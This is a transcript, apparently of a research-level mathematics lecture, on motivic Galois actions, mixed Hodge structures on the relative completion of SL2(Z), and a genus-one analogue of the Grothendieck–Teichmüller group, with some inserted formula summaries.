you can push them back to statements about the actual motive, and you can deduce results about the l-adic structure of the fundamental group of P1 minus 3 points, and you can deduce results about p-adic periods as well. So that illustrates the power of this point of view. Okay, so all that to say that this technology of having motivic multiple zetas and a Hopf algebra or coalgebra structure on them is used all the time, but it really comes from this group action. So the key point is to determine this group action, and for me it's one of the most important points in the whole theory. We need to know how this motivic Galois group acts on O(pi_1^dR).
In other words, we get a map from this group into the group of automorphisms of pi_1^dR; that's what it means for this group to act on this scheme. And we know that this Galois group satisfies certain constraints, it's constrained in some way, so it lands in a certain subgroup of the group of automorphisms, which I will just denote with a prime for now, since I don't want to go into the whole theory. The key point here is that this subgroup can be described quite explicitly, and it turns out actually to be isomorphic as a scheme, but not as a group scheme, because there is no group structure here, to the fundamental group itself. And what you get from that is something slightly strange: you get an action of this pi_1 on itself, which exactly reflects the action of the Galois group. In some sense this is what's confusing about the theory, because for P1 minus 3 points the role of this automorphism group gets confused with the role of the torsor of paths, and that causes a lot of confusion; in the case of M_{1,1} you'll see that it's slightly different. Okay, so this was first done by Ihara, and as I mentioned it's extremely important: we can describe the action of this group on pi_1^dR explicitly. So there's an explicit formula; perhaps I'll just give it. I didn't prepare this, so my conventions may be the wrong way around, but essentially, if you represent this by group-like formal power series in two variables, then you get an operation on formal power series in two variables, which is something like: you multiply by f on the left and then you do a non-commutative substitution like this. Here f and g are group-like formal power series with coefficients in some ring. So you get a very concrete formula; this was discovered by Ihara, and then it's a very short argument to dualize it, as explained in my ICM proceedings: you dualize this and you get a coaction formula for motivic multiple zeta values, essentially, and we use that all the time. So really the heart is understanding this group action, and this implies the formula for the coaction on motivic MZVs, and you can really use this to compute. It's actually absolutely extraordinary that this whole philosophy gives anything at all; I feel like saying that the more you understand this, the more surprising it becomes that these very general considerations actually give you any information at all, but in fact you get an enormous amount of information from this coaction; in fact it completely determines all the relations between multiple zetas. So the next stage is some input from the motivic theory, more precisely Borel's theorem on algebraic K-theory, which tells us something about the size of this motivic Galois group. In fact we know that the Lie algebra of the unipotent radical of this motivic Galois group, or rather its associated graded, is isomorphic to the free Lie algebra on generators sigma_3, sigma_5, sigma_7 and so on, where sigma_{2n+1} is in degree minus (2n+1). These are the very famous zeta elements, sometimes called Soulé elements; and if you don't like the associated graded, you can just take the completion of the free Lie algebra on these elements. So these sigmas correspond in some sense to the odd zeta values, which in turn control the whole structure of the ring of multiple zeta values through this mechanism. So this Lie algebra controls the structure of motivic MZVs and hence all MZVs.
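Coming back to Ihara's formula mentioned above: for concreteness, here is its shape as it usually appears in the literature. As the speaker warns, the conventions (left versus right multiplication, and which series gets substituted) may be the other way around, so take this as an illustration rather than as the exact formula on the board.

\[
(g\circ f)(e_0,e_1)\;=\; g\big(e_0,\ f\,e_1\,f^{-1}\big)\cdot f(e_0,e_1),
\]

where f and g are group-like formal power series in the non-commuting variables e_0 and e_1.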
So from this, and I don't want to do the whole course on this, you get upper bounds for the dimensions of the spaces of these numbers; it's very concrete. And the final piece I want to get to is the theorem that I proved a few years ago, previously called the Deligne-Ihara conjecture, which is that this Lie algebra, in other words the sigma_3, sigma_5 and so on, act freely. So let me write the free Lie algebra as a blackboard L; then this free Lie algebra acts freely on O(pi_1^dR), and that implies that the pi_1 of P1 minus 3 points in fact generates the whole category of mixed Tate motives over the integers. Sorry? It's a conjecture; what I'm going to say later is a theorem. Oh yes, I'll state a freeness theorem that generalizes this, which involves zeta elements but also modular elements; but the caveat is that that's not the whole story, there is an infinite sequence of infinite sequences of generators, they're not just modular and zeta elements, there are Rankin-Selberg elements and so on, so that's the issue. But this is a very tricky combinatorial and analytic argument: it uses a difficult identity between multiple zetas due to Zagier, proved by the Phragmen-Lindelof principle, and it uses a tricky combinatorial argument. In the genus one situation this theorem is going to pop out without any effort; it will just pop out of the description of the structure of the analogue of this group. So we'll see that. Okay, so now the case M_{1,1}. This is what we're really interested in, and the first point is that, as a substitute for motives, we're going to work with Hodge structures. So the Betti and de Rham completions G_{1,1}^B and G_{1,1}^dR have not just a mixed Hodge structure but a limiting mixed Hodge structure; this is a new feature that we don't see in genus zero, and it's very important indeed, as I will try to explain at the very end. This was defined and computed by Hain, in a very slightly different context, but it's equivalent. So what does a limiting mixed Hodge structure have? Well, it has a geometric weight filtration W, but it also has another weight filtration M, and it has a Hodge filtration; M is called the monodromy filtration, or I might just call it the weight filtration without any adjective, and F is the Hodge filtration. So the weight filtration as a motive, if you like, is M, not W, and we think of this as a mixed Hodge structure with an extra filtration W. So how is this going to be encoded? We're going to have some rings, O(G_{1,1}^B), the affine ring, and O(G_{1,1}^dR), and there's a comparison isomorphism between them, and this is going to be encoded as a W-filtered ind-object of a category H of mixed Hodge structures, which I'm going to define now.
So what's going on here is that we've got some local systems, or variations of Hodge structure, over M_{1,1}, and on those there's a weight filtration W; you can look at the W_n part, stopping the filtration at a certain point, and you get a variation, and when you take the limit you get a genuine mixed Hodge structure. So the upshot is that for each step in the W filtration we get an actual mixed Hodge structure, and there's a lot of extra data that goes into a limiting mixed Hodge structure that I'm going to ignore for now, but it will come back very shortly. So the first thing is to define the category H. Let H be the category whose objects are triples consisting of the following; I think a version of this category was first written down by Deligne. V_B and V_dR are finite-dimensional Q vector spaces with an increasing filtration M; my habit is to write W in this context, like everybody else, but I have to remind ourselves that it's M now, the weight filtration is denoted by M, so if I accidentally write W please stop me. V_dR also has a decreasing filtration F. These are filtrations of Q vector spaces and they are finite and exhaustive. Then c is an isomorphism between the complexifications of these vector spaces which respects the weight filtration M. There's also the data of a real Frobenius, which is very useful, especially for constructing modular forms as I mentioned in the first lecture, which I won't have time to do; since I won't actually need it, I'm just going to drop it, put it in brackets and skip that. And then the key condition is that the vector space V_B, equipped with the filtration M and with the filtration F on its complexification, is a graded-polarizable Q mixed Hodge structure, whose definition I won't give; it's very well known, and it's just some linear-algebra conditions on the filtrations. And then the morphisms in this category are what you think they are: a morphism between triples is given by linear maps phi_B from V_B to V_B' and phi_dR from V_dR to V_dR' that respect everything. There's a commutative diagram involving c and c' that needs to commute, the maps need to respect the M filtration, the F filtration in the relevant case, and so on and so forth. So I'll just say they have to be compatible with the above data. This forms an abelian category; there's an obvious notion of direct sum, a notion of dual, a notion of tensor product. So it's a Q-linear abelian tensor category with duals; in other words it's in fact a Tannakian category, and it comes equipped with two fiber functors, omega_B and omega_dR, which are functors from this category to finite-dimensional vector spaces over Q, sending a triple to the corresponding Betti or de Rham vector space. So that's a fiber functor, and this is a neutral Tannakian category over Q, so from this we get a group, of course. So we let G, and this is what's going to play the role of a motivic Galois group, so it gets a curly G, with a B or a dR (there will be two such groups), be defined as the automorphisms of the corresponding fiber functor of this category. This is an affine group scheme over Q, and it plays the role of the motivic Galois group. In fact, in the case of mixed Tate motives it's no loss to work in a category of realizations: the corresponding group acts in an identical way to the motivic Galois group, so it's literally the same thing.
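To summarize the definition of H in compact form, and only as a paraphrase of what was just said, an object of H is a triple

\[
V=(V_B,\ V_{dR},\ c),\qquad
c\colon V_{dR}\otimes_{\mathbb{Q}}\mathbb{C}\ \xrightarrow{\ \sim\ }\ V_B\otimes_{\mathbb{Q}}\mathbb{C},
\]

with increasing filtrations M on V_B and V_{dR} respected by c, a decreasing filtration F on V_{dR}, such that (V_B, M, F) is a graded-polarizable mixed Hodge structure over Q. The direction of the comparison c written here is my choice of convention; it may go the other way in the lectures.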
Okay, so now I want to state a theorem: I want to view relative completion as an object in this category somehow. So let me remind you briefly that G_{1,1}, the Betti and de Rham relative completions that we defined, are group schemes over Q, affine group schemes. What that means is that the ring of functions in either case is a commutative Hopf algebra; that's what it means for these to be affine group schemes. So in particular there's a lot of data that comes with this, but there's a coproduct, and other structure. And the comparison isomorphism is then an isomorphism of Hopf algebras. All right, so what we want to do is view the affine Betti ring, the affine de Rham ring and this comparison as a triple, and it's going to be a triple in this category. I need the board eraser; no, there is none. Okay, so the theorem, where most of the work is contained in the work of Dick Hain, so this is a corollary of Hain's work: the affine ring of the Betti relative completion has natural filtrations W and M, the de Rham one has natural filtrations W, M and F, such that the triple consisting of O(G_{1,1}^B), O(G_{1,1}^dR) and the comparison, I'll say it this way and then explain a little what it means, is a W-filtered Hopf algebra object in H, or rather ind-object. So what that means, slightly more concretely, is the following; this is how we encode the geometric weight filtration. It's just saying that for every n, if we only consider the W_n part of these rings, then this is an object, in fact an ind-object; it may be infinite dimensional, sort of a limit of objects in H, but if we take any M-filtered piece of it, it will be finite dimensional. And this structure is compatible with the data that goes into the Hopf algebra; in other words, the coproducts are consistent with all these filtrations and all these structures, so it is compatible with the Hopf algebra structure. There's a little more to come for this theorem, we can be a bit more precise about this, but I'm just going to postpone it; let me pause the theorem for now. So that's already quite a tight constraint on the structure of this thing. But something that seems completely trivial, and yet is also extremely important, is the local monodromy at the cusp; I sometimes call this inertia, for reasons that will become clear. The local monodromy at the cusp defines a map from the topological fundamental group of G_m, based at the tangent vector 1 at 0, into the topological fundamental group of M_{1,1} based at d/dq, which is just SL_2(Z). I've drawn this picture already: this is the chart given by the punctured disk. If we draw the punctured disk D* and remove the origin, then we have the tangent vector of length 1, which is just the same thing as d/dq, and here we have a loop going around the origin in the positive direction. That gives us, in M_{1,1}, a loop around the cusp, and it corresponds precisely to the matrix T, which we studied last time. So essentially we have a copy of the motivic fundamental group of G_m, which is a very simple thing, sitting inside the relative completion of SL_2(Z). And this thing is geometric, motivic if you like, and therefore this homomorphism of fundamental groups actually gives morphisms on the level of completions. Another way to say it: by the universal properties of relative completion, you deduce that the same is true on the level of Betti and de Rham, so we get a map into G_{1,1}^{B/dR}.
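In symbols, writing delta for the positive loop around the origin (my notation), the local monodromy gives

\[
\pi_1^{\mathrm{top}}(\mathbb{G}_m,\ \vec{1}_0)\ \longrightarrow\ \pi_1^{\mathrm{top}}(\mathcal{M}_{1,1},\ \partial/\partial q)\ \cong\ \mathrm{SL}_2(\mathbb{Z}),
\qquad \delta\ \longmapsto\ T,
\]

and, by the universal property of relative completion, morphisms of group schemes

\[
\pi_1^{B/dR}(\mathbb{G}_m)\ \longrightarrow\ G_{1,1}^{B/dR}.
\]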
So these are morphisms of group schemes. How is this encoded? We want to say that a morphism like this is a morphism compatible with Hodge theory, and the way to say that is that it is somehow a morphism in the category H. So I will use that sort of language, but what such a statement means is that on the affine rings you get a genuine map between objects of H. To spell that out: this morphism of group schemes translates into a homomorphism of Hopf algebras in the opposite direction, and hence a map of triples. So what it means to be a morphism of group schemes in the category H is, by definition, that on the affine rings we get a morphism of Hopf algebra objects in H; that's exactly what it means. So this encodes the following: in the theory of limiting mixed Hodge structures there's a very important role played by the nilpotent operator, and this is how it comes into the theory. It's encoded by the data of a map of the motivic fundamental group of G_m into our group scheme. To make that a little more concrete and make the connection: this object is very simple. I think of this group as a group in H; it's pro-unipotent, so I can take its Lie algebra, and its Lie algebra is the Tate object. I mean, it's pro-unipotent, so it's completely determined by its Lie algebra; that's what I mean. So the Lie algebra is just the Tate object Q(1), where Q(1) is an object of H: it's just the object given by the pair of vector spaces Q and Q, with the isomorphism between them sending 1 to (2 pi i) inverse. So that's the Tate object. And so, if you're familiar with the theory of limiting mixed Hodge structures, what we've got, on the level of Lie algebras, is a map from Q(1) into here, and the image of a generator therefore gives an endomorphism of this. So this encodes the nilpotent operator N, which is also the logarithm of this path, log T, with T viewed as an element of the Betti or de Rham completion, in the sense of the theory of limiting mixed Hodge structures. And this also explains why, when last week we computed the periods of relative completion along T, in other words iterated integrals of modular forms along T, I explained that they only involved powers of 2 pi i: that's clear from this picture, because they pull back to periods of G_m, the only periods of G_m are periods of Q(1), and the period of Q(1) is essentially 2 pi i. So this remark makes it obvious why the periods of T only involve powers of 2 pi i. Okay, so in some sense this T thing is trivial, it comes from something that's geometrically very trivial, but the point is that it sits inside relative completion in quite a complicated way. And as I explained last time, that's reflected by the fact that Eisenstein series have a non-trivial zeroth Fourier coefficient, and that involves Bernoulli numbers. You can actually, I'm not going to have time to do it, but you can write out what N looks like, the image of N, in Betti and de Rham, and you get a power series involving the Eisenstein generators and Bernoulli numbers, and you also get the Petersson inner products of cusp forms. So it's actually quite a tricky object. And now let me reformulate this local monodromy in a different way again: another way to say it is that we've got a map of de Rham fundamental groups, a homomorphism, or rather a morphism of group schemes.
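For reference, the Tate object and the nilpotent operator described above can be written out as follows; the direction of the comparison map and the normalization by 2 pi i versus its inverse depend on conventions, so this is only a sketch.

\[
\mathbb{Q}(1)=\big(\mathbb{Q},\ \mathbb{Q},\ c\big),\qquad c(1)=(2\pi i)^{-1},
\]
which is pure of M-weight -2 and Hodge type (-1,-1), and the map
\[
\mathrm{Lie}\ \pi_1^{dR}(\mathbb{G}_m)\ \cong\ \mathbb{Q}(1)\ \longrightarrow\ \mathrm{Lie}\ G_{1,1}^{dR}
\]
sends a generator to the nilpotent operator N = log T.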
And since these are de Rham realizations of pro-objects in H, they get an action of this Galois group: G de Rham of H is going to act on both of them in a compatible way — compatibly with this morphism. That seems very trivial, but it actually gives a huge amount of information about the action of this motivic Galois group. Before proceeding with the description of this action, I want to remind you of the structure of relative completion and explain what these three filtrations look like; it is slightly tricky. So here is a description of the Hodge structure — or really just the filtrations — on the de Rham relative completion. It is much simpler to write things in terms of the Lie algebra. Let U11 de Rham be the pro-unipotent radical of G11 de Rham, and let lowercase u11 de Rham be its Lie algebra. This has a mixed Hodge structure as well, and I'm going to describe it. As I have mentioned a few times already, it is isomorphic to the completion of a free Lie algebra on certain generators: there are generators given by Eisenstein series, and for each cusp form there is a pair of generators, e_f prime and e_f double prime, where f is a cusp form. Last time we chose a basis of cusp forms with rational Fourier coefficients. These generators are non-canonical. Now, briefly: these x's and y's were a basis of a vector space, and everything can be promoted to the category H. Since the beginning of these lectures we've had a Betti thing going on and a de Rham thing going on, and the bottom line is that everything can just take place in H. In particular the vector space that has been playing a role, V_n, we can now view as an object of H. I remind you that V_n de Rham was the vector space spanned by these bold generators x and y. But what we gain now is a mixed Hodge structure: these x and y are not just variables any more, they are going to carry M, W and F filtrations. So V_n in H was defined, way back in the first lecture, as the n-th symmetric power of V_1, so I just need to describe the Hodge theory of V_1. In fact V_1, as an object of H, is simply a direct sum of two Tate objects, and this is a well-known fact: if you take the limiting mixed Hodge structure on the cohomology of the universal elliptic curve — the fiber at the tangential base point d/dq — you get exactly this. Sorry, I think I want homology: if I want it to be Q(0) plus Q(1), I want homology. Put another way, that tells us that the meaning of the variable x is that it spans a copy of Q(0), and the meaning of y is that it spans a copy of Q(1). So in terms of the M and F filtrations, the Hodge numbers with respect to (M, F) are here (0, 0) and here (-1, -1). And since we are working with W-filtered objects of H, we are going to put both of these in W equal to zero. And then— [Question: x and y form a basis of V_1?] Yes, x and y form a basis of V_1, and the monomials in x and y form a basis of its symmetric powers. So x is a generator of the de Rham component of this copy of Q(0), and y is a generator of the de Rham component of this copy of Q(1).
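As a compact summary of the structure just recalled — the choice of generators is non-canonical, as emphasised above, and the identification of x and y with Q(0) and Q(1) follows the board:

\[
\mathfrak{u}_{1,1}^{dR}\ \cong\ \widehat{L}\Big(\bigoplus_{n\geq 1}\mathsf{e}_{2n+2}\otimes\mathrm{Sym}^{2n}V\ \oplus\ \bigoplus_{f\ \mathrm{cusp}}\big(\mathsf{e}'_f\oplus\mathsf{e}''_f\big)\otimes\mathrm{Sym}^{2n_f}V\Big),
\qquad
V_1\ \cong\ \mathbb{Q}(0)\,\mathbf{x}\ \oplus\ \mathbb{Q}(1)\,\mathbf{y}\ \in\ \mathcal{H},
\qquad
V_n=\mathrm{Sym}^n V_1,
\]
where $f$ runs over the chosen basis of cusp forms of weight $2n_f+2$ and $\widehat{L}(\cdot)$ denotes the completed free Lie algebra on the indicated generators.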
So it's just saying that these x and y carry weights, essentially; it's not a big deal. But now the crux of the matter is that the Eisenstein generators also have a mixed Hodge structure: they correspond to Q(1), so the (M, F) Hodge numbers are again (-1, -1). This follows from the work of Steenbrink and Zucker on limiting mixed Hodge structures of curves. And they are going to sit in geometric weight W equal to minus 2n minus 2; that is really because the corresponding differential form has a pole at the cusp, which pushes the W weight down in this case. Then, for the cusp forms, e_f prime and e_f double prime are going to be copies of V_f(1), where V_f is the Hodge structure of the cusp form f — I mentioned the motive of a cusp form in an early lecture; they have a Hodge structure, and here they are Tate twisted by one. So the Hodge numbers of the motive of a cusp form of weight 2n+2 twisted by one are (2n, -1) and (-1, 2n), and these are going to sit in W equal to minus one. So this is pretty tricky, and I have to admit that we don't really know how to extract all the information from these filtrations at present. You've got a sort of three-dimensional picture with these three filtrations, which is quite hard to visualize. It gives a lot of constraints — certainly M and W are going to play a very important role and give a lot of constraints — but I have the feeling that there is more to be extracted from this. So what I am going to do now is: maybe we have a brief break, and I will draw a picture, if I can, of this Lie algebra with its Hodge structure — a moment I've been dreading, because it's quite hard to get right on the board. I can do that while you have a coffee, and when you come back you'll see a beautiful picture that will make all these filtrations abundantly clear. So this is a drawing of the Lie algebra of G, or more precisely of sl2 semi-direct u11 de Rham. The sl2 is up in weight zero; it is generated by the two differential operators x d/dy and y d/dx, and their commutator is h, which is the degree in y minus the degree in x — or the other way around. So that is sl2, and the rest are the generators of u11 de Rham. We ignore the Hodge filtration F for now and just look at the M weight filtration across the blackboard and the W filtration going down it: W is the geometric weight filtration and M is the monodromy weight filtration. The first thing to say is that negative numbers go to the right — a bad habit we've got into, but it's stuck; it's convenient this way and harder to draw the other way. So negative numbers go down here, but they go to the right, and positive numbers to the left. And the first surprising thing is that all the cusp forms are floating very high at the top: the cuspidal generators are all sitting in W equal to minus one. For every cuspidal generator you have an e_f prime and an e_f double prime — e_f here stands for both copies. So we get some elements sitting way up at the top of the W filtration, whereas the Eisenstein generators go way down in the W filtration. The other thing to say is that this sl2 acts in the obvious way on these blocks: x d/dy moves you left by two blocks, y d/dx moves you to the right by two blocks, and indeed this generates a standard representation of SL2 — this one generates a representation of SL2 of dimension three, and so on and so forth.
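Schematically, the placements of the generators just described are as follows; the W-value for the Eisenstein generators is inferred from the bracket example given a little further on (for instance $[\mathsf{e}_4 x^2,\mathsf{e}_6 x^4]$ landing in $W=-10$) and should be double-checked against the written account:

\begin{align*}
\mathsf{e}_{2n+2} &:\ \text{type }\mathbb{Q}(1),\quad (M,F)\text{-Hodge numbers }(-1,-1),\quad W=-(2n+2),\\
\mathsf{e}'_f,\ \mathsf{e}''_f &:\ \text{copies of }V_f(1),\quad \text{Hodge numbers }(2n,-1)\ \text{and}\ (-1,2n),\quad W=-1,
\end{align*}
for $f$ a cusp form of weight $2n+2$.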
So here on the left we have highest weight vectors, and at the other extremity we have lowest weight vectors, which are annihilated by this operator here, y d/dx. What I have drawn is the semi-direct product of sl2 with u11 de Rham: it is a free Lie algebra in the category of mixed Hodge structures with an action of sl2. The sl2 is up here at the top in orange — x d/dy and y d/dx — and the commutator is h, which is the degree in x minus the degree in y. The h-invariants lie on this red line here, and the red line is M equals W; it contains all the sl2 invariants. That is going to be important. So already there are no sl2 invariants among the generators: you have to take Lie brackets of at least two of these things before you get an sl2-invariant piece. The key point is that the Eisenstein generators go down in the W filtration very fast, and they are all lined up to begin in the M equals minus two column, the next one along to the right, whereas all the cusp forms are very much up at the top. That is a very important fact which is just true and is useful, but I don't feel we have fully exploited this very particular structure — I think there is a lot more information to be obtained from it. So this is M and W; I have ignored the Hodge filtration F, for which I've written a little table there for convenience. If you want to think of the Hodge filtration F, you can imagine another filtration coming out of the blackboard in three dimensions, with these things sitting on strange diagonals coming in and out of the blackboard — I just don't know how to draw that on a piece of paper, but if someone has an idea that would be useful. Okay, so this is what the Lie algebra of the de Rham relative completion looks like in all its glory — or rather most of its glory, since we've ignored the Hodge filtration in this picture. Just as a remark, by comparison: if we were to draw the same picture for P1 minus 3 points, the de Rham fundamental group is just the free Lie algebra on two generators e0 and e1, and in the corresponding picture we only have one filtration — we only have M — with e0 and e1 sitting in a single slot. So the analogous picture for P1 minus 3 points is not very interesting, but we see this incredible richness for M11, for SL2(Z). So what we've got is this object that just exists — it is the de Rham realization of a motive — and the Galois group is going to act on the whole thing, and clearly it is very rich indeed. Now I want to try to describe — oh, I forgot to say: of course these are just the generators, and then you have Lie brackets, commutators between these elements. So the Lie bracket of e4 x squared and e6 x to the fourth will be somewhere in W minus ten, over here in this column; for example you have the bracket of e4 x squared with e6 x to the fourth, and so on and so forth. So when you take Lie brackets of Eisenstein elements, they move to the right. [Question: you said the action of SL2(Z) on V1 is the natural one?] No — to get SL2 to act, I need to choose a splitting. I have slightly cheated here, or rather I hadn't, until I wrote down a commutator. We have G11 de Rham, it sits in an exact sequence with SL2 — I put a de Rham label for bookkeeping purposes — and it has a unipotent radical. What we can do, and it is always useful for computations, is to split this.
So we choose a splitting, and I mentioned this last time. What's new here — and sl2 acts on the right, I think — what's new now is that we have Hodge structures. And the fact of the matter is that you can always choose a splitting compatibly with all of the M, W and F filtrations: you can split compatibly with W, M and F. Once you've chosen a splitting, that is the same thing as choosing an action of SL2 on U, and on the level of the Lie algebra you get this guy, which is what I've drawn. [Question: but what about SL2(Z)?] Ah, SL2(Z), sorry — no, there is no action of SL2(Z) per se; it is really an action of sl2, the Lie algebra. SL2(Z) will appear, but in a slightly different way. [So sl2 acts on V1 in the natural way?] That's correct. SL2(Z) is really the Betti side, because SL2(Z) is the fundamental group and you always get a map from the fundamental group into the Q-rational points of the Betti relative completion; but I have drawn the de Rham side here, so that is not the best way to think about it in the de Rham picture. So how does SL2(Z) act here? Well, this is what I explained last time: SL2(Z) acts via these cocycles. We had SL2(Z) going to G11 Betti (Q), and then via the comparison that gave us something in G11 de Rham (C), which is isomorphic to SL2 de Rham semi-direct U11 de Rham (C); so every matrix gamma gives us a gamma bar — I call it gamma bar because there are some irritating 2 pi i's, though in this basis you won't see them — and a cocycle C gamma. This cocycle somehow spreads the path gamma throughout the whole de Rham picture. So the path S, which we had last time, is going to do what you think it does up here on the SL2 part, and then the cocycle C_S is going to spread it out, with all these periods, all through the de Rham side. [Question: what is the connection between SL2(Z) and the de Rham SL2?] That is gamma goes to gamma bar, which I explained last time: it is essentially the same matrix, but with 2 pi i's in there, and then I have switched between the de Rham and Betti bases, which eats up the 2 pi i's. [These 2 pi i's — are they all equal to 1 then?] Exactly, exactly — it is just bookkeeping. So here I am writing the bold x's; last time when I did the cocycle I wrote it using the other x and y, but these are essentially the same and differ by multiplying or dividing by 2 pi i. That is the origin of the 2 pi i, which is very irritating but very important. Right, so now let me describe the Galois action. 'Galois' in inverted commas — it is not a classical Galois group in any sense. G11 de Rham is the de Rham component of a pro-object in H; therefore it has an action of the automorphisms of the category H. And this action knows everything. This is the holy grail: if we could understand this action we would know everything there is to know about mixed modular motives. This action — I'll just write this quickly — knows everything; it completely determines the structure of G11 as an object of H, and hence the category which I mentioned a few lectures back. So define a category of mixed modular motives, MMM gamma — I remind you of the definition here: it is just the full subcategory of H generated by the affine ring O(G11).
So that means all sub-objects and quotient objects, duals, tensor products thereof, etc. That is what I define to be the category of mixed modular motives, and understanding this category is equivalent to understanding this action. Of course we could enhance the category H — I am just working with Betti and de Rham because it is the quickest way to get information about this action; you can throw in other realizations if you like. So then the question is: how on earth could we possibly compute this action? It seems hopeless, but in fact, surprisingly, you can get very far. I am going to restrict the action not to the full Galois group but just to the unipotent radical. The action of the semi-simple part we essentially know: there is not much to say, it is really encoded by the action of Hecke operators, and it amounts to understanding the pure objects in this category, which are the motives of modular forms, which we know. So all the interesting stuff is in the unipotent radical. Its action — the unipotent radical acts on everything in sight — is going to determine all the extensions in this category, and that is what we really want to know. Right. Okay, so what do we know about this action? Well, we know that it has to respect the local monodromy. We know a few other things as well that I haven't had time to discuss, but most of the content is in this little picture that I am going to draw. So we have the local monodromy: the fundamental group of Gm, given by a single loop, and this map, the local monodromy, into G11, which I am going to call kappa, for want of a better name. And G11 is an extension of SL2 by its pro-unipotent radical. What does this local monodromy look like? Well, it takes the little loop in the q-disk, which I called gamma zero, and sends it, as I explained, to T here; but it also has a component up here which is interesting and complicated. Now this morphism from G11 to SL2 is a morphism in H, and this is a subgroup in the category H: every morphism in this diagram is compatible with the Hodge theory and comes from a morphism in the category H. That means the motivic Galois group — the Galois group of H — respects all the maps in this diagram. In fact we can be much more precise: SL2 is very simple — its affine ring is given in terms of the endomorphisms of this vector space V — so it is essentially of Tate type. And as I explained earlier, the fundamental group of the punctured disk is also pure — even simpler, it is pure Tate in H. So they are incredibly simple, and the action of this motivic Galois group on them factors through a very, very small quotient. In particular — since for simplicity I am only going to look at the unipotent radical — the unipotent radical of the Galois group of this category acts trivially, by definition, on all pure objects. So it acts trivially on both SL2 and this pi 1 — or rather on their de Rham components — because it acts trivially on all pure objects of H by definition; that is the definition of U, the subgroup which acts trivially on pure objects, or direct sums of pure objects. Okay, so now a definition: suppose we have an exact sequence of affine group schemes over a field K of characteristic zero, where S is reductive or pro-reductive and U is pro-unipotent.
So this is the situation we've got with G11 over there, and what we have is that this group of symmetries acts trivially on this, and therefore in particular it preserves this subgroup. So we want to understand: when an affine group scheme acts on a short exact sequence of affine group schemes, what does that look like? If we take any short exact sequence of affine group schemes with pro-unipotent kernel and pro-reductive quotient — and in fact this is the general picture for any such group scheme — then we can define the automorphisms of G which respect pi: they are the automorphisms of the group scheme G, so group homomorphisms alpha such that pi composed with alpha equals pi. Now, when I write this, what I mean is that for every ring R we take the R-points of the group scheme and look at automorphisms on the level of points. So what this is is a functor — I write it without reference to the ring of points you are taking — a functor from commutative K-algebras to groups. And one has to be careful here: it is not true in general that the automorphisms of a group scheme form a group scheme; there are conditions under which this functor is representable. In this case it is going to be representable, so it is not a problem, but I don't want to go into that. So I will just say that this, for me, is a functor from commutative K-algebras to groups: given a commutative K-algebra R, the automorphisms over R are the isomorphisms from the R-points of G to itself which commute with this projection. [Question: and you say that this is representable?] It is — I have to think — yes, I think it is in this case. Certainly in the application it is definitely representable. Somewhere I wrote down some conditions: you can prove that the automorphisms of a pro-unipotent group scheme are representable, and if you have filtrations on the group schemes then there is a condition for representability that I wrote in some paper which is on the arXiv. In this case I think it is fine — I didn't actually check — but for the case of SL2(Z), the case we are going to apply this to, it is definitely representable. I am just saying that one has to be a little bit careful. And when you think of automorphisms, these are automorphisms on the level of points; there are some subtle questions related to this which just don't arise here, so I won't go into them. So then the theorem is that for every splitting sigma of this short exact sequence — sorry, I make S act on the right, I think — there is a canonical isomorphism of this automorphism group with U semi-direct Aut_S(U), modulo an equivalence. Here Aut_S(U), the S-equivariant automorphisms of U, means the automorphisms from U to itself which commute with the S-action — so they are S-equivariant. So what are the elements of this thing? First I'll write down elements of U semi-direct Aut_S(U), and then I'll explain the equivalence. On the level of points they are given by pairs (b, phi), where b is in U and phi is an S-equivariant automorphism. And there is an equivalence relation: we say that a pair (b, phi) is equivalent to (b a, a inverse phi a) — so phi gets conjugated by an element a — for any S-invariant element a of U.
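Schematically, and with the caveat that the precise side on which $a$ acts depends on the right-action conventions just fixed, the statement reads:

\[
\mathrm{Aut}_\pi(G)\ \cong\ \big(U\rtimes \mathrm{Aut}_S(U)\big)\big/\!\sim,
\qquad
(b,\varphi)\ \sim\ \big(b\,a,\ a^{-1}\varphi\,a\big)\quad\text{for all } a\in U^S,
\]
where $\mathrm{Aut}_S(U)$ denotes the $S$-equivariant automorphisms of $U$ and $U^S$ the $S$-invariant elements of $U$.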
So these pairs (b, phi) form a group with the obvious semi-direct product law, the usual one, modulo the equivalence relation which multiplies b on the right by an S-invariant element of U and conjugates phi by that same S-invariant element of U. We denote the equivalence class by square brackets [b, phi]. And what we get then — because the action of this group preserves, respects, pure objects, and this is pure and this is pure — is that it acts on G in such a way that it commutes with the projection pi, and it fixes the image of kappa. To say that in equations: we get a map from the de Rham Galois group to a certain automorphism group A de Rham, which is a subgroup of the pi-respecting automorphisms of G11 — namely the subgroup of automorphisms which, first of all, respect the Hodge-theoretic structure, more precisely the weight filtrations W and M (they do not have to respect the Hodge filtration F, but they have to respect W and M), and which preserve kappa, i.e. leave it invariant. In my paper there is an extra condition that we know these automorphisms satisfy which I am not talking about; so in my paper A actually means something else, this plus an extra condition, but there is no time to explain that. So we can make this concrete: if we pick a splitting G11 de Rham isomorphic to SL2 de Rham semi-direct U11 de Rham, then we can write this group down quite concretely using the theorem over there. So let (T, kappa plus) be the image of a generator gamma of pi 1 of Gm. This kappa plus is really another name for the cocycle C_T, which we partly computed last time — just slightly different notation in a very slightly different context. You can think of it literally as the power series C_T which we computed: it involves some complicated expressions and Bernoulli numbers — we computed part of it — and it also encodes Petersson inner products. Concretely, then, A de Rham, via the previous theorem, can be written as the W- and M-preserving elements of U11 de Rham semi-direct Aut_{SL2}(U11 de Rham) — that is, every motivic automorphism can be represented by an equivalence class [b, phi], with b here and phi here — such that it preserves kappa; in other words, such that it satisfies the equation b slash T, times phi of kappa plus, times b inverse, equals kappa plus. That is the condition that the Galois group preserves the image of the generator under the morphism kappa. So this defines a group, a subgroup of the automorphisms of relative completion, and it really is the genus one analogue of the Grothendieck–Teichmüller group. Okay. To explain this definition a bit more carefully, let me explain how it acts on cocycles; that should illuminate the discussion somewhat. The point is that this is actually a massive constraint on what these motivic automorphisms can possibly look like: this condition, which looks innocuous, is in fact extremely restrictive. So, as a remark, let us explain how this automorphism group acts on cocycles. We get an action of this automorphism group — and in particular of these equivalence classes — on cocycles.
